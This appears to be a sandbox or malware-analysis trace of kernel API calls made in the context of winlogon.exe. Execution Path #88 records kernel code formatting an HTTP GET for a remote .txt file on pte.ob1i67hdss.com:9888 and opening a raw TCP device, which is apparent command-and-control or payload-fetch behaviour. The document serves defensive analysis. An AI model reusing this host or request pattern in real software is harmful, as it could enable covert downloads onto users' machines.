| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7c, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4ec, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7c, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd00043ff5098, ret_val_out = 0x0 |
| ZwOpenFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd00043ff5040, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Device\HarddiskVolume1\Windows\System32\winlogon.exe, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ShareAccess = 0x3, OpenOptions = 0x0, FileHandle_ptr_out = 0xffffd00043ff5008, FileHandle_out = 0xffffffff80000f98, IoStatusBlock_unk_out = 0xffffd00043ff5030, ret_val_out = 0x0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000f98, DesiredAccess_unk = 0x10000000, ObjectType_unk = 0xffffe0003a468dc0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00043ff50a8, Object_out = 0xffffe0003c87c8a0, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| IoVolumeDeviceToDosName | VolumeDeviceObject_ptr = 0xffffe0003b695780, DosName_out = C:, ret_val_out = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x86, ret_val_ptr_out = 0xffffe0003a763d70 |
| RtlAppendUnicodeStringToString | Destination = \??\, Source = C:, Destination_out = \??\C:, ret_val_out = 0x0 |
| RtlAppendUnicodeStringToString | Destination = \??\C:, Source = \Windows\System32\winlogon.exe, Destination_out = \??\C:\Windows\System32\winlogon.exe, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003c87c8a0, ret_val_ptr_out = 0x8000 |
| ZwClose | Handle_unk = 0xffffffff80000f98, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0x4ec, ret_val_out = 0x0 |
| RtlFreeAnsiString | AnsiString = \ |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #71 (length: 8, count: 37, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 8 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 37 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00028a11ef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #74 (length: 13, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c8359e0, Irp_unk_out = 0xffffe0003c8359e0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000bbc, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd0002af86b88, Object_out = 0xffffe0003b6db7a0, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003b6db7a0, ret_val_ptr_out = 0x7fff |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x28, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af83eb0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x103 |
Execution Path #75 (length: 3, count: 9, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 3 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 9 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003be6f490, Irp_unk_out = 0xffffe0003be6f490, ret_val_out = 0x103 |
Execution Path #77 (length: 24, count: 10, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 24 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 10 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessId | ret_val_unk_out = 0x1fc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7882a0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x1fc, Process_unk_out = 0xffffd0002af86540, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003bc53300, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002af864f8, Handle_out = 0xffffffff80001004, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001004, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af864f0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7c, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001004, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7c, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002af864f0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001004, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003bc53300, ret_val_ptr_out = 0x6805d |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\winlogon.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7a1ad0, Irp_unk_out = 0xffffe0003b7a1ad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a78841c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c439c20, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002af86340, ret_val_unk_out = 0xffffe0003b7c9cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c439c20, Irp_unk = 0xffffe0003b7c9cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
Execution Path #80 (length: 10, count: 3, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 10 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029a2cef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #81 (length: 23, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 23 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsGetCurrentProcessId | ret_val_unk_out = 0x1fc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a786b90 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003bc53300, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002a4394f8, Handle_out = 0xffffffff80001074, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001074, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002a4394f0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7c, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001074, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7c, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002a4394f0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001074, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003bc53300, ret_val_ptr_out = 0x6808e |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\winlogon.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a786d0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c306640 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c439c20, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002a439340, ret_val_unk_out = 0xffffe0003c674cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c306640, MemoryDescriptorList_unk_out = 0xffffe0003c306640 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c439c20, Irp_unk = 0xffffe0003c674cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c674cf0, Irp_unk_out = 0xffffe0003c674cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c306640 |
Execution Path #83 (length: 12, count: 5, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 5 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd00029a6bef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #88 (length: 127, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 127 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc800, Tag = 0x48545450, ret_val_ptr_out = 0xffffe0003a7a5000 |
| sprintf | _Format = GET /%s HTTP/1.1 Host: %s:%s Accept:*/* User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) Connection:Keep-Alive , _Dest_out = GET /fp_1gVSnNlpoF1fqA6M.txt HTTP/1.1 Host: pte.ob1i67hdss.com:9888 Accept:*/* User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) Connection:Keep-Alive , ret_val_out = 167 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x32, Tag = 0x54444953, ret_val_ptr_out = 0xffffe0003c634300 |
| RtlInitUnicodeString | SourceString = \Device\Tcp, DestinationString_out = \Device\Tcp |
| ZwCreateFile | DesiredAccess_unk = 0xc0100000, ObjectAttributes_ptr = 0xffffd000292aa368, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Device\Tcp, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x1, CreateDisposition = 0x1, CreateOptions = 0x0, EaBuffer_ptr = 0xffffe0003c634300, EaBuffer_deref_NextEntryOffset = 0x0, EaBuffer_deref_Flags = 0x0, EaBuffer_deref_EaNameLength = 0x10, EaBuffer_deref_EaValueLength = 0x16, EaBuffer_deref_EaName = TransportAddress, EaBuffer_deref_EaValue_ptr = 0xffffe0003c634319, EaBuffer_deref_EaValue_deref_data = BINARY(offset=64451001,skipped=0,size=22), EaLength = 0x32, FileHandle_ptr_out = 0xffffd000292aa608, FileHandle_out = 0xffffffff80000ffc, IoStatusBlock_unk_out = 0xffffd000292aa338, ret_val_out = 0x0 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x1fc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7b1b90 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x1fc, Process_unk_out = 0xffffd000292a9a80, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003bc53300, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd000292a9a38, Handle_out = 0xffffffff80000ffc, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ffc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd000292a9a30, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7c, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000ffc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7c, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd000292a9a30, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000ffc, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003bc53300, ret_val_ptr_out = 0x680a4 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\winlogon.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a7b1d0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c439c20, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000292a9880, ret_val_unk_out = 0xffffe0003c839cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c439c20, Irp_unk = 0xffffe0003c839cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000ffc, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd000292aa550, Object_out = 0xffffe0003c851f20, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x22, Tag = 0x54444953, ret_val_ptr_out = 0xffffe0003a788210 |
| ZwCreateFile | DesiredAccess_unk = 0xc0100000, ObjectAttributes_ptr = 0xffffd000292aa368, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Device\Tcp, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x1, CreateDisposition = 0x1, CreateOptions = 0x0, EaBuffer_ptr = 0xffffe0003a788210, EaBuffer_deref_NextEntryOffset = 0x0, EaBuffer_deref_Flags = 0x0, EaBuffer_deref_EaNameLength = 0x11, EaBuffer_deref_EaValueLength = 0x8, EaBuffer_deref_EaName = ConnectionContext, EaBuffer_deref_EaValue_ptr = 0xffffe0003a78822a, EaBuffer_deref_EaValue_deref_data = BINARY(offset=64465186,skipped=0,size=8), EaLength = 0x32, FileHandle_ptr_out = 0xffffd000292aa610, FileHandle_out = 0xffffffff80001060, IoStatusBlock_unk_out = 0xffffd000292aa338, ret_val_out = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c7, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7b6530 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80001060, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd000292aa5f0, Object_out = 0xffffe0003a4beb50, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| IoGetRelatedDeviceObject | FileObject_unk = 0xffffe0003c851f20, ret_val_unk_out = 0xffffe0003c439c20 |
| IoGetLowerDeviceObject | DeviceObject_unk = 0xffffe0003c439c20, ret_val_unk_out = 0xffffe0004c9e7d00 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd000292aa398 |
